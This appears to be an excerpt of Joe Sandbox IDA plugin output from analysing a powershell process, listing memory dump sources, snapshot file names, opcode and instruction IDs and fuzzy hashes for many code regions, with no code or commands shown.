                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dbd0f6656c0489abee06f41c639491b023b0804ba33c323a808e81f90b36d71e
                                                                                                                                                                                • Instruction ID: 8626f4e856ee4394234c0f32011dfe3121dd56f20328a51bec82477ef2cc333a
                                                                                                                                                                                • Opcode Fuzzy Hash: dbd0f6656c0489abee06f41c639491b023b0804ba33c323a808e81f90b36d71e
                                                                                                                                                                                • Instruction Fuzzy Hash: C0B18B34B00605DFDB05DBB8D854AAEBBF6FF88341F14852DE94AAB391DB749801CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 38f58c591b8a76794b7e3982750cb42077a9d18e75a22212fc052fbda0d07b99
                                                                                                                                                                                • Instruction ID: 928ff59c43c0ed54ba247981ae7da0e41e7b5803f7bb93c7bb4188b6bf4c630c
                                                                                                                                                                                • Opcode Fuzzy Hash: 38f58c591b8a76794b7e3982750cb42077a9d18e75a22212fc052fbda0d07b99
                                                                                                                                                                                • Instruction Fuzzy Hash: F4C17C74A10345DFDB15EF68C884A9EBBB2FF88341F148669E5099B351DB70EC46CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1e12248d61f2091b580a4d5aabb7dc5fb89749aec9dc8d6bcae2ab06622e9666
                                                                                                                                                                                • Instruction ID: 789f44e6deb86c1db078475b0c764ea00a6d3a683500960308a71104faf709eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e12248d61f2091b580a4d5aabb7dc5fb89749aec9dc8d6bcae2ab06622e9666
                                                                                                                                                                                • Instruction Fuzzy Hash: E6A16A30B00609CFDB18DF69D894BAEB7B6EF88301F10856DE916AB294DF759C45CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 421035dec84d56a815e199db38ad2b798feb037e56fd77942c03405045b48e64
                                                                                                                                                                                • Instruction ID: e02e9edff2dccd6b90e5d62eeb67e46b6541c062a23ce210f5dcc98c23b93e6d
                                                                                                                                                                                • Opcode Fuzzy Hash: 421035dec84d56a815e199db38ad2b798feb037e56fd77942c03405045b48e64
                                                                                                                                                                                • Instruction Fuzzy Hash: EB91EF34B00345AFEB14EB79E8947AEBAE6EF84341F14453DD609EB380DFB598458B60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2173429287.0000000008D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d5e569ed8d450c3750fc2998329ab6c1f7810c0391cd7e0ff2e7949f2ecc4127
                                                                                                                                                                                • Instruction ID: 266776137cbfa4e2a3563ea1a033baabd865209a8458ff9ee57615a8b697d00a
                                                                                                                                                                                • Opcode Fuzzy Hash: d5e569ed8d450c3750fc2998329ab6c1f7810c0391cd7e0ff2e7949f2ecc4127
                                                                                                                                                                                • Instruction Fuzzy Hash: FC910334B002588FCB2CDFB9D84462E77B6AFC92A1B1886ADD546CB351DB34DC11CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 547be203bd2934d48a928f44e020c2e86d09ba29799df753a305b6c916217da7
                                                                                                                                                                                • Instruction ID: f054b65e137f0dc7d5fa5ab5a51a6f9929a7100f95aee143fc89c1106f500059
                                                                                                                                                                                • Opcode Fuzzy Hash: 547be203bd2934d48a928f44e020c2e86d09ba29799df753a305b6c916217da7
                                                                                                                                                                                • Instruction Fuzzy Hash: 50A18B342007458FD704EB74D890A5EB7A2FFC4290F158A78D2468F6A5DFB0ED4ACB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 80b87136972a61ecc5b6770cebe1b7f39102b9688e3eb9fbf7305e20dd6320f7
                                                                                                                                                                                • Instruction ID: 3305e2a711ab54e03c9dc086430b26c8c334c19411caae0d7c644987bea63ae1
                                                                                                                                                                                • Opcode Fuzzy Hash: 80b87136972a61ecc5b6770cebe1b7f39102b9688e3eb9fbf7305e20dd6320f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 39B14678A012189FCB14CFA9D580AADFBF2FF88350F158299E855AB361D770ED45CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 284c01ef82ae6b82ed009c3f36b09915be0dd79c0cd28d1ad6d4cb823763c7d4
                                                                                                                                                                                • Instruction ID: 6ee1ebf6e9e8838aeba06cf7933c4aaced180dec8a782a39221910453ba0f388
                                                                                                                                                                                • Opcode Fuzzy Hash: 284c01ef82ae6b82ed009c3f36b09915be0dd79c0cd28d1ad6d4cb823763c7d4
                                                                                                                                                                                • Instruction Fuzzy Hash: DCA16D34A00208DFDB15EF68D994AAEBBF6FF88351F158669E405AB351DB34EC42CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4278ccae263c2c347830ef1e6a4c3a98d1e71c26940df1e0c9e539d3e2f8de36
                                                                                                                                                                                • Instruction ID: 13c78e279ade634965b3729cfc1d158c6726c26e14cccef355c6365ee3e4246d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4278ccae263c2c347830ef1e6a4c3a98d1e71c26940df1e0c9e539d3e2f8de36
                                                                                                                                                                                • Instruction Fuzzy Hash: A8A13834A00205DFDB24CF65E584BADBBF2EF48302F1485A9E919EB291DB75E981CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b175f77f9464ca61e7a2024ed5ea9758c607adf4f0b8ac6af3d2244738b70059
                                                                                                                                                                                • Instruction ID: 0ee00173b40bca750507d8557027db02592c1fbc0985eb8c82ac1411b08409a6
                                                                                                                                                                                • Opcode Fuzzy Hash: b175f77f9464ca61e7a2024ed5ea9758c607adf4f0b8ac6af3d2244738b70059
                                                                                                                                                                                • Instruction Fuzzy Hash: 56915B38B00204CFDB04DBB8D454AAEBBF6EF88751F258069DA12AB391DB75DC41CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: efe4e5629b07ced73b30cf7962cbc75a5fc78ac97389e824afe63bca151cf422
                                                                                                                                                                                • Instruction ID: 9b5fb1e2837704c708637272201db6add5e7b3951d619c17759e39a90c31a3b6
                                                                                                                                                                                • Opcode Fuzzy Hash: efe4e5629b07ced73b30cf7962cbc75a5fc78ac97389e824afe63bca151cf422
                                                                                                                                                                                • Instruction Fuzzy Hash: 9181B434700218EFDF159B24D89897FBBABFBC4291B188209E9429F351DF35CD419B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 71b7b3c6dde4513fb84dbf1910eee6ec2447c224cdd21b0b6cd4d1802a2a1311
                                                                                                                                                                                • Instruction ID: 6b89b60d9cf6f9ea0db5d75db411f72be51d839140642d9c165c9f3701eef850
                                                                                                                                                                                • Opcode Fuzzy Hash: 71b7b3c6dde4513fb84dbf1910eee6ec2447c224cdd21b0b6cd4d1802a2a1311
                                                                                                                                                                                • Instruction Fuzzy Hash: E2918A34A00615CFDB24DBA9C894BAEBBB6FF84701F14847DD8169B295DB71DC46CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8e785d385118e6464aa5e8fbbe59a363c10a37fa0c07b244cd9b814cd78a9ff5
                                                                                                                                                                                • Instruction ID: 08a3f094dc4431613b3b4434a2d2d1643f8c0839b3e43387a4bc9f2bdfffcb2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e785d385118e6464aa5e8fbbe59a363c10a37fa0c07b244cd9b814cd78a9ff5
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CA17A70600745DFCF20DF69E880AAEBBB2FF48351B10862DD5469B761DB70E846CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e674e80d14e26d71527374edcbc76f9671475734d7baea61046976d49562c56d
                                                                                                                                                                                • Instruction ID: 8b04d65d4a1c5cb5dadc658bbe0266fbf4c3af433ce4ab46845120e242202b00
                                                                                                                                                                                • Opcode Fuzzy Hash: e674e80d14e26d71527374edcbc76f9671475734d7baea61046976d49562c56d
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FA11834A00305DFDB15DFA8C464BAEBBB3FF44312F518099E949AB255CB75A981CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1b2407711fe0da68267ed3ef954bc62f7ade43d9b5292faa5b587d611f8b684
                                                                                                                                                                                • Instruction ID: 7c5f8a56cf2502ef22ba5a326d2ddea2b1fc07841d1b7f81871ebb605ed21da9
                                                                                                                                                                                • Opcode Fuzzy Hash: c1b2407711fe0da68267ed3ef954bc62f7ade43d9b5292faa5b587d611f8b684
                                                                                                                                                                                • Instruction Fuzzy Hash: D7817B342007458FD704EB78D890A6EB7A2FFC4290B158A3CD1468F665EFB0ED49CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e90cd4ee17589ae92cfe04964eb85ab67f5f19455a265ed9f7d119b86a6db56a
                                                                                                                                                                                • Instruction ID: 6b86cde3e75467f375048a8dfc5edabdbf10ff063a9f7f14ad0e28c0ee09a698
                                                                                                                                                                                • Opcode Fuzzy Hash: e90cd4ee17589ae92cfe04964eb85ab67f5f19455a265ed9f7d119b86a6db56a
                                                                                                                                                                                • Instruction Fuzzy Hash: 90912C34A00249DFDB14DFA4D894BAEBBB6EF88311F148569E906AB394DB349D41CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3b8ddb915d6da2d99c245a84781162f786c1c35a5d37e449fd4f09604d15f636
                                                                                                                                                                                • Instruction ID: 63e6d538a4734bae514a220d18af87447125b9dc2dfe479e8926898b8db90442
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b8ddb915d6da2d99c245a84781162f786c1c35a5d37e449fd4f09604d15f636
                                                                                                                                                                                • Instruction Fuzzy Hash: 91816B34B012149FDB04DBA5E894AAEB7F6FF88351F14C169E906EB390EB34D8458B60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0cb7bc579f9de59a9d3c8fbcc0ca65efd35ea2d8d536cb4f2496acc57351986c
                                                                                                                                                                                • Instruction ID: f46d4fafe615ad6ba14ae9b531347079bbd214de7ec0ac67fc5bfc6af1eeaad6
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cb7bc579f9de59a9d3c8fbcc0ca65efd35ea2d8d536cb4f2496acc57351986c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6681AC34200B409FD725EB64C494BAAB7F2FF88352F148A2DD6429B791DBB5EC41CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ff94ec90eb2b89ddfa318873804896265e2b3f697fce24f2b2dc4601f168fb1e
                                                                                                                                                                                • Instruction ID: caccb627c1c4091aca420915089fc46225f32952b989c66ee41df01f56ef5c94
                                                                                                                                                                                • Opcode Fuzzy Hash: ff94ec90eb2b89ddfa318873804896265e2b3f697fce24f2b2dc4601f168fb1e
                                                                                                                                                                                • Instruction Fuzzy Hash: C3818234700701CFDB25AF65E9587AAB7B7FB88342F04852DEA069B6A4CB74AD41CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 34aa00db98a4bff90a440eb33893adad785462194e33ea4c0deb0a2ac2aaee0f
                                                                                                                                                                                • Instruction ID: de5698c83681619e828e167fb16f93e0be324dc3a02f648289b4b45cbf9d56dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 34aa00db98a4bff90a440eb33893adad785462194e33ea4c0deb0a2ac2aaee0f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C813A397012149FC705DBA8D454AAEBBF7FF98311F2580A9E906AB3A4CB75EC41CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 61335179bed7ffb87dd3d50f1ef80254528032a03ec8c5337fb33900db074642
                                                                                                                                                                                • Instruction ID: 6cb73c496c0692d27b94b77ad9dad5b3b71810af63871d3462b785c06d47f040
                                                                                                                                                                                • Opcode Fuzzy Hash: 61335179bed7ffb87dd3d50f1ef80254528032a03ec8c5337fb33900db074642
                                                                                                                                                                                • Instruction Fuzzy Hash: 60912D34A20218CFDB25DF54C984B99B7F2BF88351F158299E9099B361CB75ED81CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: aa84768a7d9e0e2242122921fb5937c44723b203287396bf57d52ad10f300f4a
                                                                                                                                                                                • Instruction ID: 9a61eb21276c4fd2f5d626624746e67e82348cb6605760a50e9e093ea45a3f93
                                                                                                                                                                                • Opcode Fuzzy Hash: aa84768a7d9e0e2242122921fb5937c44723b203287396bf57d52ad10f300f4a
                                                                                                                                                                                • Instruction Fuzzy Hash: CD911A74A002158FCB14EF65D58499DBBF1BF9C331F1992A8E805AB3A6D730E885CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5a2a4a1d94f47dd0de86d55f95ad06dc9bcc53246aaf8d24d76af7c07f376ffe
                                                                                                                                                                                • Instruction ID: e6c2e51d3fc1f3e3419b3afb54a58850e2dfacdb5933fa4cb4389961b8367f9e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a2a4a1d94f47dd0de86d55f95ad06dc9bcc53246aaf8d24d76af7c07f376ffe
                                                                                                                                                                                • Instruction Fuzzy Hash: 77911A34A00624CFCB14DF68C494AADB7F2EF88312F2580A8E455AB761DB35EC45CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6128c7d56e40adcc628cffd6caf94c4ce56a08082614d26d5bcdf9fc40be299b
                                                                                                                                                                                • Instruction ID: 50ade7445d76d33be8f9f442a759a384900c15249f97920fe6c6b97b0d352642
                                                                                                                                                                                • Opcode Fuzzy Hash: 6128c7d56e40adcc628cffd6caf94c4ce56a08082614d26d5bcdf9fc40be299b
                                                                                                                                                                                • Instruction Fuzzy Hash: E69139B8610605DFDB15DFA5C584A6EBBF2FF88351B108668E90A8B361D731EC91CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19c86aa1b9ef17352c7bf7b11ecba7f98f3e74938fec02193ad25e778003feb0
                                                                                                                                                                                • Instruction ID: bfc87ceaebe55481d2e8c1bae6f211ad00ee2f26475f9681288cf39e0433cbb7
                                                                                                                                                                                • Opcode Fuzzy Hash: 19c86aa1b9ef17352c7bf7b11ecba7f98f3e74938fec02193ad25e778003feb0
                                                                                                                                                                                • Instruction Fuzzy Hash: DB814D34A002049FDB14DB68D498FAEBBF2AF88351F15C169E545AB3A1CB75EC85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fc3db7e2807b0dd91a5d5b9f3283a08c4610126424d3c23dfc213788c6cc5397
                                                                                                                                                                                • Instruction ID: fabfa77920c23cc1545f6f4d7c10d9ae877304cd6a5a6ce94e3e11993ed5368e
                                                                                                                                                                                • Opcode Fuzzy Hash: fc3db7e2807b0dd91a5d5b9f3283a08c4610126424d3c23dfc213788c6cc5397
                                                                                                                                                                                • Instruction Fuzzy Hash: 08811A35B00209DFDB18DF59D884AADBBB2FF88365F188259E805AB355E730DC45CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e1ac43cfa64d50128567b4bead12465e468fbc40116dda70fd40a09145fbc110
                                                                                                                                                                                • Instruction ID: 98f0334b0726396a2f0caf8fecc1da4d1cf757fa5e4382f238ceba83947b95ff
                                                                                                                                                                                • Opcode Fuzzy Hash: e1ac43cfa64d50128567b4bead12465e468fbc40116dda70fd40a09145fbc110
                                                                                                                                                                                • Instruction Fuzzy Hash: D2815734A00208DFDB11DF68D984A9EBBF2AF88300F148669E545AB3A1DB71EC45CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dac753f49cc15aef913d7b21468b9fbc90278346304e59fa6acfe30b4dd5358b
                                                                                                                                                                                • Instruction ID: e87dc5896f15c2313163bba73fb9f55889327cddd94e2e6afedf57d5eee327f8
                                                                                                                                                                                • Opcode Fuzzy Hash: dac753f49cc15aef913d7b21468b9fbc90278346304e59fa6acfe30b4dd5358b
                                                                                                                                                                                • Instruction Fuzzy Hash: C581E774A00204CFDB14DF69DA84A9DBBF1BF88351F1582A9E845AB3A1DB31ED41CF64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b58f3ce8dbbda1c1df8bfb505ac3c2a9d522e1db8d917969a23e311103a240d4
                                                                                                                                                                                • Instruction ID: 38527df8bd96b8b70bd5f6ba83c5cd4d8abef338c4852991944890cc25471680
                                                                                                                                                                                • Opcode Fuzzy Hash: b58f3ce8dbbda1c1df8bfb505ac3c2a9d522e1db8d917969a23e311103a240d4
                                                                                                                                                                                • Instruction Fuzzy Hash: DE610B31A052A48FDB15CF68C844AAEBFB2EF85311F1985AED445AB2A1C738DC46C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6da60dc4860f71053f2084c2381892fe4e804ab28fc4f84330d66bc169e878b6
                                                                                                                                                                                • Instruction ID: 80cb94c4b42f17b1194512eccfea3ab04cac0b88b2245b0aacf52211290cef4d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6da60dc4860f71053f2084c2381892fe4e804ab28fc4f84330d66bc169e878b6
